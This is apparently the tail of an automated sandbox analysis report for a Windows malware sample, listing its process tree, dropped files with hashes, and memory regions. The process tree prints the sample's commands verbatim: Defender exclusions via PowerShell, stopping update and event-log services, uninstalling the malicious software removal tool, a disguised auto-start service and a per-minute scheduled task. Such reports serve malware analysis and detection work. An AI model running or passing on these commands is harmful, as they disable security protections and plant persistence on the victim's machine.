                                                                                                    PID:2000
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                    7⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:5080
                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                      8⤵
                                                                                                        PID:2356
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                      7⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4328
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                      7⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:832
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                      7⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:4452
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                      7⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:1680
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                      7⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:3224
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                      7⤵
                                                                                                      • Power Settings
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4380
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                      7⤵
                                                                                                      • Power Settings
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4460
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                      7⤵
                                                                                                      • Power Settings
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4368
                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                      7⤵
                                                                                                      • Power Settings
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3572
                                                                                                    • C:\Windows\system32\dialer.exe
                                                                                                      C:\Windows\system32\dialer.exe
                                                                                                      7⤵
                                                                                                        PID:4768
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        C:\Windows\system32\sc.exe delete "BTTHHWER"
                                                                                                        7⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:5024
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        C:\Windows\system32\sc.exe create "BTTHHWER" binpath= "C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe" start= "auto"
                                                                                                        7⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:2964
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                        7⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:3028
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        C:\Windows\system32\sc.exe start "BTTHHWER"
                                                                                                        7⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:1660
                                                                                                    • C:\Windows\RuntimeBroker.exe
                                                                                                      "C:\Windows\RuntimeBroker.exe" /verysilent
                                                                                                      6⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:824
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4300
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\RuntimeBroker.exe'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1200
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\RuntimeBroker.exe'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4876
                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "RuntimeBroker" /tr "C:\ProgramData\RuntimeBroker.exe"
                                                                                                        7⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:3124
                                                                                                    • C:\Windows\RuntimeBroker.exe
                                                                                                      "C:\Windows\RuntimeBroker.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4608
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                            1⤵
                                                                                              PID:3552
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                              1⤵
                                                                                                PID:3756
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3992
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4116
                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:2220
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:4844
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                        1⤵
                                                                                                          PID:1064
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:1740
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                            1⤵
                                                                                                              PID:4224
                                                                                                            • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                              "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                              1⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:2168
                                                                                                            • C:\Windows\system32\SppExtComObj.exe
                                                                                                              C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:2668
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                1⤵
                                                                                                                  PID:1072
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                  1⤵
                                                                                                                    PID:4780
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                    1⤵
                                                                                                                      PID:2108
                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe c3b1f6ecf4be5027c599eca17d604dbe 0sxHLKYJKkCzgDh1du/pzg.0.1.0.0.0
                                                                                                                      1⤵
                                                                                                                      • Sets service image path in registry
                                                                                                                      PID:3912
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        2⤵
                                                                                                                          PID:4920
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                        1⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:4912
                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                        1⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Enumerates system info in registry
                                                                                                                        PID:4568
                                                                                                                      • C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe
                                                                                                                        C:\ProgramData\vyjyyzidkbdb\zrtdwpgwlkoj.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4320
                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                          2⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:972
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                          2⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:2176
                                                                                                                          • C:\Windows\system32\wusa.exe
                                                                                                                            wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                            3⤵
                                                                                                                              PID:4448
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                            2⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:1376
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                            2⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:4368
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                            2⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3200
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop bits
                                                                                                                            2⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3444
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            C:\Windows\system32\sc.exe stop dosvc
                                                                                                                            2⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3656
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4040
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2336
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:2388
                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                            2⤵
                                                                                                                            • Power Settings
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3844
                                                                                                                          • C:\Windows\system32\dialer.exe
                                                                                                                            C:\Windows\system32\dialer.exe
                                                                                                                            2⤵
                                                                                                                              PID:4452
                                                                                                                            • C:\Windows\system32\dialer.exe
                                                                                                                              C:\Windows\system32\dialer.exe
                                                                                                                              2⤵
                                                                                                                                PID:4728
                                                                                                                              • C:\Windows\system32\dialer.exe
                                                                                                                                dialer.exe
                                                                                                                                2⤵
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3572
                                                                                                                            • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                              1⤵
                                                                                                                                PID:3668
                                                                                                                              • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:4380

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                                                                                  Filesize

                                                                                                                                  1KB

                                                                                                                                  MD5

                                                                                                                                  a8a147915e3a996fdbe10b3a3f1e1bb2

                                                                                                                                  SHA1

                                                                                                                                  abc564c1be468d57e700913e7b6cf8f62d421263

                                                                                                                                  SHA256

                                                                                                                                  8b96a8557deea66696837af011843d6a82451ba57c8f9b5a2726a70818d6fc7e

                                                                                                                                  SHA512

                                                                                                                                  17b42f17ef60a9f625703172763f692e5ed2ca93564a97853dfa72bb0ac6305ef3267aea0b205938e3aa8eac10156d9d4f322b30d0329d92d647bcec6372731c

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                  SHA1

                                                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                  SHA256

                                                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                  SHA512

                                                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Filesize

                                                                                                                                  944B

                                                                                                                                  MD5

                                                                                                                                  62623d22bd9e037191765d5083ce16a3

                                                                                                                                  SHA1

                                                                                                                                  4a07da6872672f715a4780513d95ed8ddeefd259

                                                                                                                                  SHA256

                                                                                                                                  95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                                                                                  SHA512

                                                                                                                                  9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Filesize

                                                                                                                                  944B

                                                                                                                                  MD5

                                                                                                                                  67e8893616f805af2411e2f4a1411b2a

                                                                                                                                  SHA1

                                                                                                                                  39bf1e1a0ddf46ce7c136972120f512d92827dcd

                                                                                                                                  SHA256

                                                                                                                                  ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

                                                                                                                                  SHA512

                                                                                                                                  164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Filesize

                                                                                                                                  944B

                                                                                                                                  MD5

                                                                                                                                  2709f3515c9fdf254003b81cb596f05c

                                                                                                                                  SHA1

                                                                                                                                  7f7be559531ba27641977f9acb42160e9b025912

                                                                                                                                  SHA256

                                                                                                                                  63ca05e6ca84593c33346466e8bdd1568b85ff09d40d1d9d7158d00b1ac291a1

                                                                                                                                  SHA512

                                                                                                                                  0ca8b1dd47b18078e453a3f307a7be8cae3476adaac1d94a28ddde4152131a4071cad7dac6e21d6cd556defa860cda06b92ab662898ae38344955b75c73f89cf

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ps2glavl.ni2.ps1

                                                                                                                                  Filesize

                                                                                                                                  60B

                                                                                                                                  MD5

                                                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                  SHA1

                                                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                  SHA256

                                                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                  SHA512

                                                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp

                                                                                                                                  Filesize

                                                                                                                                  3.2MB

                                                                                                                                  MD5

                                                                                                                                  3d1cca2f13bb47bf0831cbc51aed9dcf

                                                                                                                                  SHA1

                                                                                                                                  8778a5e8406a10d97e4fb5f56aae3daca8ce147f

                                                                                                                                  SHA256

                                                                                                                                  a3fe3785d7c05c9aae3fcfef09b01dc4a4746d3724436fd506b7b84b2a5b60ef

                                                                                                                                  SHA512

                                                                                                                                  bb8ad21c3cbe427b43caec1a9c13c0dbba4d81654a81f94a8c8484a6b77bea135904b8e702cddba48ed64330df4383873b80aea8b318c8bc1b1ff124e0c9c13c

                                                                                                                                • C:\Windows\RuntimeBroker.exe

                                                                                                                                  Filesize

                                                                                                                                  366KB

                                                                                                                                  MD5

                                                                                                                                  4f5692a403b1b3dd667c76ce1f11d880

                                                                                                                                  SHA1

                                                                                                                                  383940ce84f31672f1ce3e029a2a62f8c4fd71df

                                                                                                                                  SHA256

                                                                                                                                  f1db2121b89f530bd74ed44c8a14e2ee3734db74fbb722f16c9f2466fb6e23c4

                                                                                                                                  SHA512

                                                                                                                                  f0a1af04232e625800973b2b9f83d8273fffb7abda790007fef58b2e1a644a530a30df0bea2e66714ba7512f930a3e8b2af21b03119e783d563edcb22691b248

                                                                                                                                • C:\Windows\planet.exe

                                                                                                                                  Filesize

                                                                                                                                  7.1MB

                                                                                                                                  MD5

                                                                                                                                  818c13bbcf389d9f4364e705d5cbb63e

                                                                                                                                  SHA1

                                                                                                                                  6b326d59f56f03023f4c6766bc92d3ff8749482b

                                                                                                                                  SHA256

                                                                                                                                  5be3ee6cccd092da185a0507c254589c8d1192e1260a5a2c5502ab261b55ddc8

                                                                                                                                  SHA512

                                                                                                                                  f5a23a34922314f32e78c6be3964ced80d6b81727e2d3325f92936bf773cc55050523993850c8bcb8c0ffafd4a47bc198c61e600d7f752cee451016f5199eaa0

                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                  Filesize

                                                                                                                                  2KB

                                                                                                                                  MD5

                                                                                                                                  2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                  SHA1

                                                                                                                                  445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                  SHA256

                                                                                                                                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                  SHA512

                                                                                                                                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                  Filesize

                                                                                                                                  1KB

                                                                                                                                  MD5

                                                                                                                                  b42c70c1dbf0d1d477ec86902db9e986

                                                                                                                                  SHA1

                                                                                                                                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                                                                                                                  SHA256

                                                                                                                                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                                                                                                                  SHA512

                                                                                                                                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                                                                                                                • memory/388-189-0x0000021C6AFE0000-0x0000021C6B00B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-161-0x00007FFBE2510000-0x00007FFBE2520000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/612-153-0x00000181A9A20000-0x00000181A9A4B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-160-0x00000181A9A20000-0x00000181A9A4B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-155-0x00000181A9A20000-0x00000181A9A4B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/612-152-0x00000181A99F0000-0x00000181A9A15000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  148KB

                                                                                                                                • memory/668-172-0x00007FFBE2510000-0x00007FFBE2520000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/668-171-0x0000028312680000-0x00000283126AB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/668-165-0x0000028312680000-0x00000283126AB000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/824-77-0x000000001DD90000-0x000000001DDA4000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  80KB

                                                                                                                                • memory/824-76-0x000000001DAC0000-0x000000001DB1C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  368KB

                                                                                                                                • memory/944-176-0x000001E060810000-0x000001E06083B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/944-182-0x000001E060810000-0x000001E06083B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/944-183-0x00007FFBE2510000-0x00007FFBE2520000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  64KB

                                                                                                                                • memory/972-187-0x0000010C4C3C0000-0x0000010C4C3C6000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  24KB

                                                                                                                                • memory/972-188-0x0000010C4C3D0000-0x0000010C4C3DA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/972-128-0x0000010C4C160000-0x0000010C4C17C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  112KB

                                                                                                                                • memory/972-129-0x0000010C4C180000-0x0000010C4C235000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  724KB

                                                                                                                                • memory/972-130-0x0000010C4C150000-0x0000010C4C15A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/972-131-0x0000010C4C3A0000-0x0000010C4C3BC000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  112KB

                                                                                                                                • memory/972-147-0x0000010C4C3E0000-0x0000010C4C3FA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  104KB

                                                                                                                                • memory/972-143-0x0000010C4C380000-0x0000010C4C38A000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  40KB

                                                                                                                                • memory/972-149-0x0000010C4C390000-0x0000010C4C398000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/1116-6-0x00000000013F0000-0x00000000013F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/1116-11-0x0000000000F20000-0x0000000001263000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  3.3MB

                                                                                                                                • memory/1276-1581-0x0000000000380000-0x00000000003E2000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  392KB

                                                                                                                                • memory/2968-17-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  4KB

                                                                                                                                • memory/2968-38-0x00000000002C0000-0x0000000000603000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  3.3MB

                                                                                                                                • memory/3088-137-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/3088-138-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/3088-146-0x00007FFC21CB0000-0x00007FFC21D6E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/3088-144-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/3088-145-0x00007FFC22490000-0x00007FFC22685000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/3088-148-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/3088-135-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/3088-136-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  32KB

                                                                                                                                • memory/4300-42-0x00000272F2360000-0x00000272F2382000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  136KB

                                                                                                                                • memory/4400-134-0x00007FFC21CB0000-0x00007FFC21D6E000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  760KB

                                                                                                                                • memory/4400-142-0x000001371D830000-0x000001371DA4C000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.1MB

                                                                                                                                • memory/4400-132-0x000001371DDC0000-0x000001371DDEA000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  168KB

                                                                                                                                • memory/4400-133-0x00007FFC22490000-0x00007FFC22685000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  2.0MB

                                                                                                                                • memory/4416-1604-0x00000000001F0000-0x0000000000252000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  392KB

                                                                                                                                • memory/4600-39-0x0000000000A60000-0x0000000000B44000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  912KB

                                                                                                                                • memory/4600-9-0x0000000000A60000-0x0000000000B44000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  912KB

                                                                                                                                • memory/4608-35-0x00000000004E0000-0x0000000000542000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  392KB

                                                                                                                                • memory/4768-95-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/4768-93-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/4768-92-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/4768-97-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/4768-94-0x0000000140000000-0x000000014002B000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  172KB

                                                                                                                                • memory/4964-13-0x0000000000A60000-0x0000000000B44000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  912KB

                                                                                                                                • memory/4964-0-0x0000000000A60000-0x0000000000B44000-memory.dmp

                                                                                                                                  Filesize

                                                                                                                                  912KB

